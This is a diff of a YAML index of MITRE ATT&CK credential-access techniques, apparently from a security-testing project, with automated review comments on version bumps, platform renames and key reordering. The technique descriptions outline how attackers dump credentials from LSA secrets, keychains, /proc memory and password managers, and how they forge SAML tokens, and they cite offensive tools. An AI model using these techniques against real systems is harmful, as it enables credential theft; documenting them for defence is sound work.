+ modified: '2024-10-15T15:12:43.034Z'
name: OS Credential Dumping
description: |
Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password. Credentials can be obtained from OS caches, memory, or structures.(Citation: Brining MimiKatz to Unix) Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information.
@@ -44139,12 +44798,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003
atomic_tests: []
T1539:
technique:
- modified: '2024-04-16T12:56:56.861Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Steal Web Session Cookie
description: |-
An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.
@@ -44159,10 +44817,11 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- Johann Rehberger
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: Monitor for attempts to access files and repositories on
a local system that are used to store browser session cookies. Monitor for
@@ -44170,14 +44829,14 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Process: Process Access'
- 'File: File Access'
@@ -44220,14 +44879,11 @@ credential-access:
url: https://blog.talosintelligence.com/roblox-scam-overview/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1539
atomic_tests: []
T1003.002:
technique:
- modified: '2023-07-24T18:53:10.860Z'
+ modified: '2024-10-15T16:40:52.174Z'
name: 'OS Credential Dumping: Security Account Manager'
description: "Adversaries may attempt to extract credential material from the
Security Account Manager (SAM) database either through in-memory techniques
@@ -44282,14 +44938,13 @@ credential-access:
url: https://github.com/Neohapsis/creddump7
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003.002
atomic_tests: []
T1552.005:
technique:
- modified: '2023-03-21T13:56:27.910Z'
+ modified: '2024-10-15T16:24:20.219Z'
name: 'Unsecured Credentials: Cloud Instance Metadata API'
description: |
Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.
@@ -44340,9 +44995,8 @@ credential-access:
url: https://krebsonsecurity.com/2019/08/what-we-can-learn-from-the-capital-one-hack/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552.005
atomic_tests:
- name: Azure - Dump Azure Instance Metadata from Virtual Machines
@@ -44369,7 +45023,7 @@ credential-access:
name: powershell
T1555.002:
technique:
- modified: '2024-03-29T16:37:34.772Z'
+ modified: '2024-10-15T16:41:18.638Z'
name: Securityd Memory
description: |-
An adversary with root access may gather credentials by reading `securityd`’s memory. `securityd` is a service/daemon responsible for implementing security protocols such as encryption and authorization.(Citation: Apple Dev SecurityD) A privileged adversary may be able to scan through `securityd`'s memory to find the correct sequence of keys to decrypt the user’s logon keychain. This may provide the adversary with various plaintext passwords, such as those for users, WiFi, mail, browsers, certificates, secure notes, etc.(Citation: OS X Keychain)(Citation: OSX Keydnap malware)
@@ -44403,8 +45057,8 @@ credential-access:
external_id: T1555.002
- source_name: External to DA, the OS X Way
description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
- DA, the OS X Way. Retrieved July 3, 2017.
- url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
+ DA, the OS X Way. Retrieved September 12, 2024.
+ url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
- source_name: Apple Dev SecurityD
description: Apple. (n.d.). Security Server and Security Agent. Retrieved
March 29, 2024.
@@ -44421,11 +45075,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1110.002:
technique:
- modified: '2023-03-30T21:01:48.643Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Brute Force: Password Cracking'
description: "Adversaries may use password cracking to attempt to recover usable
credentials, such as plaintext passwords, when credential material such as
@@ -44443,7 +45096,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Mohamed Kmal
x_mitre_deprecated: false
@@ -44460,10 +45113,10 @@ credential-access:
- Linux
- macOS
- Windows
- - Office 365
- - Azure AD
- Network
- x_mitre_version: '1.2'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Application Log: Application Log Content'
@@ -44487,46 +45140,12 @@ credential-access:
url: https://en.wikipedia.org/wiki/Password_cracking
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1110.002
atomic_tests: []
T1555.001:
technique:
- x_mitre_platforms:
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--1eaebf46-e361-4437-bc23-d5d65a3b92e3
- created: '2020-02-12T18:55:24.728Z'
- x_mitre_version: '1.1'
- external_references:
- - source_name: mitre-attack
- external_id: T1555.001
- url: https://attack.mitre.org/techniques/T1555/001
- - source_name: External to DA, the OS X Way
- url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
- description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
- DA, the OS X Way. Retrieved July 3, 2017.
- - source_name: Keychain Services Apple
- url: https://developer.apple.com/documentation/security/keychain_services
- description: Apple. (n.d.). Keychain Services. Retrieved April 11, 2022.
- - source_name: Empire Keychain Decrypt
- url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/keychaindump_decrypt.py
- description: Empire. (2018, March 8). Empire keychaindump_decrypt Module.
- Retrieved April 14, 2022.
- - source_name: OSX Keychain Schaumann
- url: https://www.netmeister.org/blog/keychain-passwords.html
- description: Jan Schaumann. (2015, November 5). Using the OS X Keychain to
- store and retrieve passwords. Retrieved March 31, 2022.
- - source_name: Keychain Decryption Passware
- url: https://support.passware.com/hc/en-us/articles/4573379868567-A-Deep-Dive-into-Apple-Keychain-Decryption
- description: Yana Gourenko. (n.d.). A Deep Dive into Apple Keychain Decryption.
- Retrieved April 13, 2022.
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-10-15T16:35:39.985Z'
+ name: 'Credentials from Password Stores: Keychain'
description: "Adversaries may acquire credentials from Keychain. Keychain (or
Keychain Services) is the macOS credential management system that stores account
names, passwords, private keys, certificates, sensitive application data,
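Review bot: the deletions under `T1555.001: technique:` (platforms, domains, markings, id, created, `x_mitre_version: '1.1'`, the full reference list, the deprecated and revoked flags) are a key reorder rather than a removal: the next hunk re-adds every one of those fields with the same values, `x_mitre_version: '1.1'` included. The substantive changes to Keychain are therefore the `modified` timestamp and the refreshed External to DA reference (https URL and new retrieval date), and a citation-only refresh leaving the technique version at 1.1 is consistent with that.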
@@ -44547,65 +45166,62 @@ credential-access:
file. Both methods require a password, where the default password for the
Login Keychain is the current user’s password to login to the macOS host.(Citation:
External to DA, the OS X Way)(Citation: Empire Keychain Decrypt) "
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Credentials from Password Stores: Keychain'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: Unlocking the keychain and using passwords from it is a very
common process, so there is likely to be a lot of noise in any detection technique.
Monitoring of system calls to the keychain can help determine if there is
a suspicious process trying to access it.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: credential-access
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Creation'
- 'Process: OS API Execution'
- 'File: File Access'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--1eaebf46-e361-4437-bc23-d5d65a3b92e3
+ created: '2020-02-12T18:55:24.728Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1555/001
+ external_id: T1555.001
+ - source_name: External to DA, the OS X Way
+ description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
+ DA, the OS X Way. Retrieved September 12, 2024.
+ url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
+ - source_name: Keychain Services Apple
+ description: Apple. (n.d.). Keychain Services. Retrieved April 11, 2022.
+ url: https://developer.apple.com/documentation/security/keychain_services
+ - source_name: Empire Keychain Decrypt
+ description: Empire. (2018, March 8). Empire keychaindump_decrypt Module.
+ Retrieved April 14, 2022.
+ url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/keychaindump_decrypt.py
+ - source_name: OSX Keychain Schaumann
+ description: Jan Schaumann. (2015, November 5). Using the OS X Keychain to
+ store and retrieve passwords. Retrieved March 31, 2022.
+ url: https://www.netmeister.org/blog/keychain-passwords.html
+ - source_name: Keychain Decryption Passware
+ description: Yana Gourenko. (n.d.). A Deep Dive into Apple Keychain Decryption.
+ Retrieved April 13, 2022.
+ url: https://support.passware.com/hc/en-us/articles/4573379868567-A-Deep-Dive-into-Apple-Keychain-Decryption
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1555.001
atomic_tests: []
T1003.004:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Ed Williams, Trustwave, SpiderLabs
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--1ecfdab8-7d59-4c98-95d4-dc41970f57fc
- type: attack-pattern
- created: '2020-02-21T16:22:09.493Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1003.004
- url: https://attack.mitre.org/techniques/T1003/004
- - source_name: Passcape LSA Secrets
- url: https://www.passcape.com/index.php?section=docsys&cmd=details&id=23
- description: Passcape. (n.d.). Windows LSA secrets. Retrieved February 21,
- 2020.
- - source_name: Microsoft AD Admin Tier Model
- url: https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material?redirectedfrom=MSDN
- description: Microsoft. (2019, February 14). Active Directory administrative
- tier model. Retrieved February 21, 2020.
- - source_name: Tilbury Windows Credentials
- url: https://www.first.org/resources/papers/conf2017/Windows-Credentials-Attacks-and-Mitigation-Techniques.pdf
- description: 'Chad Tilbury. (2017, August 8). 1Windows Credentials: Attack,
- Mitigation, Defense. Retrieved February 21, 2020.'
- - source_name: ired Dumping LSA Secrets
- url: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets
- description: Mantvydas Baranauskas. (2019, November 16). Dumping LSA Secrets.
- Retrieved February 21, 2020.
- - url: https://github.com/mattifestation/PowerSploit
- description: PowerSploit. (n.d.). Retrieved December 4, 2014.
- source_name: Powersploit
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-13T15:49:17.591Z'
name: 'OS Credential Dumping: LSA Secrets'
description: |-
Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in the registry at HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets
. LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets)
@@ -44614,6 +45230,9 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_contributors:
+ - Ed Williams, Trustwave, SpiderLabs
+ x_mitre_deprecated: false
x_mitre_detection: 'Monitor processes and command-line arguments for program
execution that may be indicative of credential dumping. Remote access tools
may contain built-in features or incorporate existing tools like Mimikatz.
@@ -44621,31 +45240,63 @@ credential-access:
such as PowerSploit''s Invoke-Mimikatz module,(Citation: Powersploit) which
may require additional logging features to be configured in the operating
system to collect necessary information for analysis.'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Access'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--1ecfdab8-7d59-4c98-95d4-dc41970f57fc
+ created: '2020-02-21T16:22:09.493Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1003/004
+ external_id: T1003.004
+ - source_name: Tilbury Windows Credentials
+ description: 'Chad Tilbury. (2017, August 8). 1Windows Credentials: Attack,
+ Mitigation, Defense. Retrieved February 21, 2020.'
+ url: https://www.first.org/resources/papers/conf2017/Windows-Credentials-Attacks-and-Mitigation-Techniques.pdf
+ - source_name: ired Dumping LSA Secrets
+ description: Mantvydas Baranauskas. (2019, November 16). Dumping LSA Secrets.
+ Retrieved February 21, 2020.
+ url: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets
+ - source_name: Microsoft AD Admin Tier Model
+ description: Microsoft. (2019, February 14). Active Directory administrative
+ tier model. Retrieved February 21, 2020.
+ url: https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material?redirectedfrom=MSDN
+ - source_name: Passcape LSA Secrets
+ description: Passcape. (n.d.). Windows LSA secrets. Retrieved February 21,
+ 2020.
+ url: https://www.passcape.com/index.php?section=docsys&cmd=details&id=23
+ - source_name: Powersploit
+ description: PowerSploit. (n.d.). Retrieved December 4, 2014.
+ url: https://github.com/mattifestation/PowerSploit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1003.004
atomic_tests: []
T1606.002:
technique:
- modified: '2024-03-01T17:55:56.116Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Forge Web Credentials: SAML token'
description: |-
An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.(Citation: Microsoft SolarWinds Steps) The default lifetime of a SAML token is one hour, but the validity period can be specified in the NotOnOrAfter
value of the conditions ...
element in a token. This value can be changed using the AccessTokenLifetime
in a LifetimeTokenPolicy
.(Citation: Microsoft SAML Token Lifetimes) Forged SAML tokens enable adversaries to authenticate across services that use SAML 2.0 as an SSO (single sign-on) mechanism.(Citation: Cyberark Golden SAML)
An adversary may utilize [Private Keys](https://attack.mitre.org/techniques/T1552/004) to compromise an organization's token-signing certificate to create forged SAML tokens. If the adversary has sufficient permissions to establish a new federation trust with their own Active Directory Federation Services (AD FS) server, they may instead generate their own trusted token-signing certificate.(Citation: Microsoft SolarWinds Customer Guidance) This differs from [Steal Application Access Token](https://attack.mitre.org/techniques/T1528) and other similar behaviors in that the tokens are new and forged by the adversary, rather than stolen or intercepted from legitimate users.
- An adversary may gain administrative Azure AD privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)
+ An adversary may gain administrative Entra ID privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Blake Strom, Microsoft 365 Defender
- Oleg Kolesnikov, Securonix
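Review bot: key ordering is inconsistent: `+ x_mitre_attack_spec_version: 3.2.0` is inserted for T1606.002 between kill_chain_phases and x_mitre_contributors (T1552 gets the same placement further down), whereas T1555.005, T1556.002, T1558.004 and T1558.005 in this diff all carry that key after object_marking_refs. If this file is regenerated from the upstream STIX bundle the order is whatever the generator emits, but an unstable key order turns every future sync into move-only churn; sorting keys in the generator would make real content changes reviewable. In this hunk the only content change is the Azure AD to Entra ID wording in the description.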
@@ -44658,14 +45309,14 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- SaaS
- Windows
- - Office 365
- - Google Workspace
- IaaS
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Web Credential: Web Credential Usage'
- 'Web Credential: Web Credential Creation'
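Review bot: platform rename needs a follow-up check: the T1606.002 platform list drops Azure AD, Office 365 and Google Workspace and adds Office Suite and Identity Provider, with x_mitre_version bumped '1.3' to '1.4'. This repository derives per-platform index files from x_mitre_platforms, so confirm that indexes for the two new platform names are generated and that the three retired names are either removed or kept deliberately; otherwise the technique silently disappears from the platform indexes it used to appear in while no index for Identity Provider exists yet.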
@@ -44706,14 +45357,11 @@ credential-access:
url: https://www.sygnia.co/golden-saml-advisory
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1606.002
atomic_tests: []
T1003.007:
technique:
- modified: '2024-04-10T16:41:01.496Z'
+ modified: '2024-10-15T15:13:32.253Z'
name: 'OS Credential Dumping: Proc Filesystem'
description: |-
Adversaries may gather credentials from the proc filesystem or `/proc`. The proc filesystem is a pseudo-filesystem used as an interface to kernel data structures for Linux based systems managing virtual memory. For each process, the `/proc//maps` file shows how memory is mapped within the process’s virtual address space. And `/proc//mem`, exposed for debugging purposes, provides access to the process’s virtual address space.(Citation: Picus Labs Proc cump 2022)(Citation: baeldung Linux proc map 2022)
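Review bot: `- spec_version: '2.1'` is removed for T1606.002 here and for every other technique block in this diff (T1003.007, T1040, T1552.002, T1555, T1555.005, T1556.002, T1558, T1558.004). That is reasonable if spec_version is treated as a STIX bundle property rather than a per-technique one, but it is a schema change for anything that parses this index, so the commit message should say so explicitly. The T1003.007 `modified` bump to 2024-10-15 has no accompanying content change visible in this hunk; fine if it mirrors upstream, but worth a glance at the rest of that block.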
@@ -44776,81 +45424,79 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003.007
atomic_tests: []
T1555.005:
technique:
+ modified: '2024-08-19T13:53:33.661Z'
+ name: Password Managers
+ description: |-
+ Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)
+
+ Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)
+ Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ x_mitre_contributors:
+ - Matt Burrough, @mattburrough, Microsoft
+ x_mitre_deprecated: false
+ x_mitre_detection: "Consider monitoring API calls, file read events, and processes
+ for suspicious activity that could indicate searching in process memory of
+ password managers. \n\nConsider monitoring file reads surrounding known password
+ manager applications."
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- macOS
- Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Matt Burrough, @mattburrough, Microsoft
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - 'Process: Process Access'
+ - 'Process: OS API Execution'
+ - 'File: File Access'
+ - 'Command: Command Execution'
type: attack-pattern
+ id: attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21
created: '2021-01-22T16:08:40.629Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1555.005
url: https://attack.mitre.org/techniques/T1555/005
- - source_name: ise Password Manager February 2019
- url: https://www.ise.io/casestudies/password-manager-hacking/
- description: 'ise. (2019, February 19). Password Managers: Under the Hood
- of Secrets Management. Retrieved January 22, 2021.'
+ external_id: T1555.005
+ - source_name: Cyberreason Anchor December 2019
+ description: 'Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM
+ A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September
+ 10, 2020.'
+ url: https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware
- source_name: FoxIT Wocao December 2019
- url: https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf
description: 'Dantzig, M. v., Schamper, E. (2019, December 19). Operation
Wocao: Shining a light on one of China’s hidden hacking groups. Retrieved
October 8, 2020.'
+ url: https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf
+ - source_name: ise Password Manager February 2019
+ description: 'ise. (2019, February 19). Password Managers: Under the Hood
+ of Secrets Management. Retrieved January 22, 2021.'
+ url: https://www.ise.io/casestudies/password-manager-hacking/
- source_name: Github KeeThief
- url: https://github.com/GhostPack/KeeThief
description: Lee, C., Schoreder, W. (n.d.). KeeThief. Retrieved February 8,
2021.
+ url: https://github.com/GhostPack/KeeThief
- source_name: NVD CVE-2019-3610
- url: https://nvd.nist.gov/vuln/detail/CVE-2019-3610
description: National Vulnerability Database. (2019, October 9). CVE-2019-3610
Detail. Retrieved April 14, 2021.
- - source_name: Cyberreason Anchor December 2019
- url: https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware
- description: 'Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM
- A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September
- 10, 2020.'
- modified: '2022-05-11T14:00:00.188Z'
- name: Password Managers
- description: |-
- Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)
-
- Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)
- Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: credential-access
- x_mitre_detection: "Consider monitoring API calls, file read events, and processes
- for suspicious activity that could indicate searching in process memory of
- password managers. \n\nConsider monitoring file reads surrounding known password
- manager applications."
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ url: https://nvd.nist.gov/vuln/detail/CVE-2019-3610
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- x_mitre_data_sources:
- - 'Process: Process Access'
- - 'Process: OS API Execution'
- - 'File: File Access'
- - 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1040:
technique:
- modified: '2024-04-19T12:32:44.370Z'
+ modified: '2024-10-15T15:11:55.217Z'
name: Network Sniffing
description: |-
Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
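Review bot: the T1555.005 block is almost entirely a reorder, and the substantive changes are easy to miss inside it: x_mitre_version '1.0' to '1.1', `modified` 2022-05-11 to 2024-08-19, x_mitre_attack_spec_version 2.1.0 to 3.2.0, `revoked: false` and `x_mitre_deprecated: false` added, and `x_mitre_permissions_required: - User` dropped. The description, the detection text, the four data sources and the five external_references are byte-for-byte the same, only moved. Dropping permissions_required is a field removal that downstream tooling may key on, so it deserves a mention in the commit message alongside the spec_version removal.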
@@ -44935,12 +45581,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1040
atomic_tests: []
T1552.002:
technique:
- modified: '2023-07-28T18:29:56.525Z'
+ modified: '2024-10-15T16:26:46.873Z'
name: 'Unsecured Credentials: Credentials in Registry'
description: |-
Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
@@ -44989,38 +45634,13 @@ credential-access:
url: https://pentestlab.blog/2017/04/19/stored-credentials/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552.002
atomic_tests: []
T1556.002:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Vincent Le Toux
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
- type: attack-pattern
- created: '2020-02-11T19:05:45.829Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.002
- url: https://attack.mitre.org/techniques/T1556/002
- - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
- description: Fuller, R. (2013, September 11). Stealing passwords every time
- they change. Retrieved November 21, 2017.
- source_name: Carnal Ownage Password Filters Sept 2013
- - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
- description: Bialek, J. (2013, September 15). Intercepting Password Changes
- With Function Hooking. Retrieved November 21, 2017.
- source_name: Clymb3r Function Hook Passwords Sept 2013
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-21T16:16:18.271Z'
name: 'Modify Authentication Process: Password Filter DLL'
